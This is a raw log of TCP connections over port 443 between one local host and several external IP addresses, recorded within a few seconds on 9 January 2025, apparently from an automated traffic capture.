Jan 9, 2025 14:56:14.138648987 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.138719082 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.159400940 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.159722090 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.159758091 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.160706997 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.160773993 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.197427988 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.197648048 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.197746038 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.197748899 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.197788000 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.197844982 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.198473930 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.198502064 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.198600054 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.198623896 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.198918104 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.198940992 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.206430912 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.206469059 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.206715107 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.206715107 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.206747055 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.264452934 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.264458895 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.264487028 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.302530050 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.302597046 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.303091049 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.303939104 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.304006100 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.305241108 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.305687904 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.305751085 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.305792093 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.307075024 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.307089090 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.307734013 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.307765007 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.307893991 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.307903051 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.497219086 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.497258902 CET	443	50017	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.497317076 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.497587919 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.497620106 CET	443	50018	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.497690916 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.497771978 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.497785091 CET	443	50017	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.497893095 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.497905016 CET	443	50018	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.536721945 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.536760092 CET	443	50019	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.537004948 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.537013054 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.537035942 CET	443	50020	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.537113905 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.538000107 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.538037062 CET	443	50019	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.538119078 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.538132906 CET	443	50020	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.840198040 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.840648890 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.840658903 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.841044903 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.841059923 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.841093063 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.841098070 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.841141939 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.841141939 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.841784954 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.843249083 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.843350887 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.843405962 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.891334057 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.910607100 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.910659075 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.911099911 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.911155939 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.911334038 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.911334038 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.911372900 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.911469936 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.911590099 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.911601067 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.967410088 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:14.967423916 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:14.981651068 CET	443	50017	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.981889009 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.981904030 CET	443	50017	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.982249975 CET	443	50017	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.982552052 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.982621908 CET	443	50017	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.982779026 CET	443	50018	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.983181953 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.983210087 CET	443	50018	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.983618021 CET	443	50018	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.983962059 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.984028101 CET	443	50018	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.000116110 CET	443	50019	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.000344038 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.000361919 CET	443	50019	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.000695944 CET	443	50019	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.001765013 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.001873970 CET	443	50019	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.018852949 CET	443	50020	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.019085884 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.019104004 CET	443	50020	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.019422054 CET	443	50020	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.019771099 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.019824982 CET	443	50020	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.103954077 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.104919910 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.104938030 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.106997967 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.107295990 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.107301950 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.113267899 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.115360975 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.115366936 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.120188951 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.120249033 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.120260954 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.125693083 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.125742912 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.125757933 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.131958008 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.132003069 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.132009029 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.138235092 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.138303041 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.138308048 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.144412994 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.144562960 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.144568920 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.156307936 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.156308889 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.156312943 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.156436920 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.192922115 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.192953110 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.192990065 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.193000078 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.193831921 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.193836927 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.200280905 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.200391054 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.200397968 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.211112022 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.211302042 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.211309910 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.212054014 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.212217093 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.212223053 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.218023062 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.218085051 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.218097925 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.224167109 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.224210024 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.224221945 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.230376005 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.230658054 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.230665922 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.236695051 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.236749887 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.236757040 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.242456913 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.242510080 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.242521048 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.250395060 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.250487089 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.250494957 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.253851891 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.253895044 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.253901958 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.258806944 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.260082006 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.260092974 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.264234066 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.264322042 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.264327049 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.269804955 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.269895077 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.269901037 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.274943113 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.275042057 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.275048971 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.280390978 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.280479908 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.280493021 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.284329891 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.284414053 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.284427881 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.288264036 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.288326025 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.288340092 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.292036057 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.293477058 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.293488026 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.295569897 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.295625925 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.295644999 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.298995972 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.299093008 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.299108028 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.302726030 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.302831888 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.302840948 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.305883884 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.305963039 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.305983067 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.309381962 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.309441090 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.309462070 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.312875986 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.312938929 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.312944889 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.316349030 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.316397905 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.316404104 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.319834948 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.320084095 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.320092916 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.323276997 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.323331118 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.323338032 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.326677084 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.326764107 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.326777935 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.330146074 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.330399990 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.330409050 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.333605051 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.333667040 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.333682060 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.337126970 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.337304115 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.337311029 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.340478897 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.340919971 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.340928078 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.344114065 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.344162941 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.344175100 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.347460032 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.347522974 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.347531080 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.351084948 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.351336956 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.351345062 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.354458094 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.354739904 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.354748964 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.357327938 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.357772112 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.357779980 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.360759974 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.360802889 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.360848904 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.360857964 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.360907078 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.363768101 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.366584063 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.366614103 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.366641045 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.366651058 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.367403984 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.370034933 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.372615099 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.372663975 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.372688055 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.372694969 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.373272896 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.374722004 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.377460957 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.377496004 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.377521992 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.377528906 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.378607035 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.378793001 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.380795002 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.380825996 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.380844116 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.380851030 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.381048918 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.381411076 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.381484985 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.381534100 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.381534100 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.381534100 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.381542921 CET	443	50016	142.250.185.97	192.168.2.10
Jan 9, 2025 14:56:15.383337021 CET	50016	443	192.168.2.10	142.250.185.97
Jan 9, 2025 14:56:15.383709908 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.391340017 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.391361952 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.392508984 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.392637968 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.392827988 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.394813061 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.394821882 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.395426989 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.395498991 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.395879030 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.396001101 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.396166086 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.396217108 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.468911886 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.468929052 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.468965054 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.469001055 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.576047897 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:15.619333982 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:15.655863047 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.655896902 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.752813101 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:15.752851009 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:15.752954006 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:15.753496885 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:15.753506899 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:15.842053890 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:15.842470884 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:15.842555046 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:15.846143007 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:15.846157074 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:15.950722933 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:15.950766087 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:15.950978994 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:15.951240063 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:15.951252937 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.366374969 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:16.366420984 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:16.366480112 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:16.367153883 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:16.367171049 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:16.439372063 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.439651012 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:16.439702034 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.440787077 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.440840006 CET	50028	443	192.168.2.10	52.182.143.215
